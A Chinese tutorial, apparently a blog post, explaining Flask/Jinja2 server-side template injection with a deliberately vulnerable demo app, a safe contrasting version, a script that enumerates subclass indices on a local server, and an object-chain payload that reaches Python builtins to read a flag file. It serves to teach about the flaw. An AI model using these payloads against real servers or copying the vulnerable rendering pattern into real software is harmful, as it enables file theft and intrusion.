Flask模板注入
Flask模板注入
Flask模板注入漏洞属于经典的SSTI(服务器模板注入漏洞)。
Flask案例
一个简单的Flask应用案例:
from flask import Flask,render_template_string
app=Flask(__name__)
@app.route('/<username>')
def hello(username):
return render_template_string('Hello %s'%username)
if __name__=='__main__':
app.run(port=8088)
路由
route装饰器的作用是将函数与url绑定,其功能是返回使用者自定义的username。
渲染方法
Flask具有两种渲染方法:render_template和render_template_string。
render_template()用于渲染给定文件,如:
return render_template('./example.html')
render_template_string()用于渲染单个字符串。这是SSTI漏洞注入问题中常见的渲染方法。使用方法如:
html='<h1>This is a test.</h1>'
return render_template_string(html)
模板
Flask使用jinja2作为渲染引擎。模板文件并不是纯粹的.html文件,由于需要渲染用户名、个性数据等,模板.html文件需要包含模板语法,如:
<!--/template/index.html-->
<html>
<h1>{{content}}</h1>
</html>
{{}}
在jinja2为变量包裹标识符。
服务端此时就能利用变量content渲染数据,如:
#test.py
from flask import Flask,url_for,redirect,render_template,render_template_string
@app.route('/index/')
def user_login():
return render_template('index.html',content='This is index page.')
页面会输出“This is index page.”。不过这是与前文案例不同的模板使用方式,这种写法能够控制模板渲染的变量,不会引起XSS利用。
规避XSS利用的思路可以用如下两端代码的对比体现:
#存在问题
@app.route('/test/')
def test():
code = request.args.get('id')
html = '''<h3>%s</h3>'''%(code)
return render_template_string(html)
#规避问题
@app.route('/test/')
def test():
code = request.args.get('id')
return render_template_string('<h1>{{ code }}</h1>',code=code)
实现注入,需要前文案例中那样有漏洞的写法。
注入试验
将jinja2的变量包裹标识符{{}}
传入,得到报错:
在服务端可以得到报错信息:jinja2.exceptions.TemplateSyntaxError: Expected an expression, got 'end of print statement'
,即触发模板,且模板需要取得表达式内容。
传入{{self}}
,返回模板数据:
案例中,模板具有引用对象username,这里没有传入,故引用对象为None。
文件查询
设定服务端的.py文件同级目录下有一个FL4G.txt文件。
定位所需函数
打开文件需要Python内建的open()函数,由于Python完全由对象构建,需要先得到Python的对象,再实例化需要的函数。
使用魔术方法(Magic Methods)。
传入{{self.__class__}}
,得到模板引用的类:
对象是类的实例,类是对象的模板。传入{{self.__class__.__base__}}
,得到对象:
得到基于当前对象的所有子类,传入{{self.__class__.__base__.__subclasses__()}}
:
返回了列表形式存储的全部结果,使用下标可以单独取得任意类。
查看type类的初始化方法,传入{{self.__class__.__base__.__subclasses__()[0].__init__}}
:
slot wrapper特征封装,不是可以直接调用的function。
使用如下脚本取得类初始化方法为function的类:
import requests
if __name__=='__main__':
for i in range(1000):
r=requests.get('http://127.0.0.1:8088/%7B%7Bself.__class__.__base__.\
__subclasses__()[{}].__init__%7D%7D'.format(i))
txt=r.text
if 'function' in txt:
print(str(i))
重新传入{{self.__class__.__base__.__subclasses__()[133].__init__}}
,这个class的初始化方法是一个function:
继续查看存放该函数全局变量的字典的引用,传入{{self.__class__.__base__.__subclasses__()[133].__init__.__globals__}}
:
在众多信息中可以查找到关于内建函数open()的信息:
调用函数
传入{{self.__class__.__base__.__subclasses__()[133].__init__.__globals__['__builtins__']}}
,可得全部内建信息,open()函数包含在内。直接调用open()函数打开文件:
{{self.__class__.__base__.__subclasses__()[133].__init__.__globals__['__builtins__'].open('FL4G.txt')}}
{{self.__class__.__base__.__subclasses__()[133].__init__.__globals__['__builtins__'].open('FL4G.txt').read()}}
小结
几种重要的魔术方法:
方法名 | 功能 |
---|---|
__class__ | 返回类型所属的对象 |
__mro__ | 返回包含对象所继承的基类元组,方法在解析时按照元组顺序解析 |
__base__ | 返回对象所继承的基类 |
__subclasses__ | 每个新类都保留子类的引用,该方法返回类中仍然可用的子类列表 |
__init__ | 类的初始化 |
__globals__ | 对包含函数全局变量的字典的引用 |
Flask模板注入的更多相关文章
- 关于flask的模板注入的学习
flask模板注入的学习 关于flask模版注入,之前不太理解,看了很多文章才弄懂,主要原理就是渲染函数的参数用户可控就造成了模板注入 就会使用户构造恶意的代码进行逃逸从而进行攻击 flask模板渲染 ...
- CTF SSTI(服务器模板注入)
目录 基础 一些姿势 1.config 2.self 3.[].() 3.url_for, g, request, namespace, lipsum, range, session, dict, g ...
- Flask(Jinja2) 服务端模板注入漏洞(SSTI)
flask Flask 是一个 web 框架.也就是说 Flask 为你提供工具,库和技术来允许你构建一个 web 应用程序.这个 wdb 应用程序可以使一些 web 页面.博客.wiki.基于 we ...
- python 模板注入
今天学习了python的模板注入,这里自己搭建环境测试以下,参考文章:http://www.freebuf.com/articles/web/136118.html web 程序包括两个文件: fla ...
- SSTI(服务器模板注入)学习
SSTI(服务器模板注入)学习 0x01 SSTI概念 SSTI看到ss两个字母就会想到服务器,常见的还有SSRF(服务器端请求伪造).SSTI就是服务器端模板注入(Server-Side Templ ...
- SSTI-服务端模板注入漏洞
原理: 服务端模板注入是由于服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,因而导致了敏感信息泄露.代码执行.GetShell ...
- SSTI-服务端模板注入
SSTI-服务端模板注入漏洞 原理: 服务端模板注入是由于服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,因而导致了敏感信息泄露. ...
- SSTI(模板注入)
SSTI 一. 什么是SSTI 模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档. ...
- SSTI服务器模板注入(以及关于渲染,solt的学习)&&[BJDCTF2020]The mystery of ip 1
ssti服务器模板注入 ssti:利用公共 Web 框架的服务器端模板作为攻击媒介的攻击方式,该攻击利用了嵌入模板的用户输入方式的弱点.SSTI 攻击可以用来找出 Web 应用程序的内容结构. slo ...
随机推荐
- codeforces 1076E Vasya and a Tree 【dfs+树状数组】
题目:戳这里 题意:给定有n个点的一棵树,顶点1为根.m次操作,每次都把以v为根,深度dep以内的子树中所有的顶点(包括v本身)加x.求出最后每个点的值为多少. 解题思路:考虑到每次都只对点及其子树操 ...
- (20002, b'DB-Lib error message 20002, severity 9:\nAdaptive Server connection failed (127.0.0.1:3306)\n')
使用python 3.7 pymssql 连接本地mysql 5.6 报错 解决:参考 https://www.cnblogs.com/springbrotherhpu/p/11503139.html ...
- mysql(二)--mysql索引剖析
1.1. 索引是什么 1.1.1.索引图解 维基百科对数据库索引的定义: 数据库索引,是数据库管理系统(DBMS)中一个排序的数据结构,以协助快速查询.更新数据库表中数据. 怎么理解这个定义呢? 首 ...
- 你不知道的 JS (系列丛书) - 第二版
你不知道的 JS (系列丛书) - 第二版 You Don't Know JS (book series) - 2nd Edition https://github.com/learning-js-b ...
- Google coding Style Guide : Google 编码风格/代码风格 手册/指南
1 1 1 https://github.com/google/styleguide Google 编码风格/代码风格 手册/指南 Style guides for Google-originated ...
- VSCode 开放式架构的产品实现思路
VSCode 开放式架构的产品实现思路 https://code.visualstudio.com/ 源码 https://github.com/microsoft/vscode https://gi ...
- LeetCode 算法题解 js 版 (001 Two Sum)
LeetCode 算法题解 js 版 (001 Two Sum) 两数之和 https://leetcode.com/problems/two-sum/submissions/ https://lee ...
- git cli all in one
git cli all in one https://www.atlassian.com/git/tutorials/learn-git-with-bitbucket-cloud git create ...
- vuex & redux
vuex & redux https://vuex.vuejs.org/ https://github.com/xgqfrms/VAIO/ https://scrimba.com/playli ...
- Nestjs 修改dist目录
修改tsconfig.json { "compilerOptions": { "outDir": "./server-dist", // 这 ...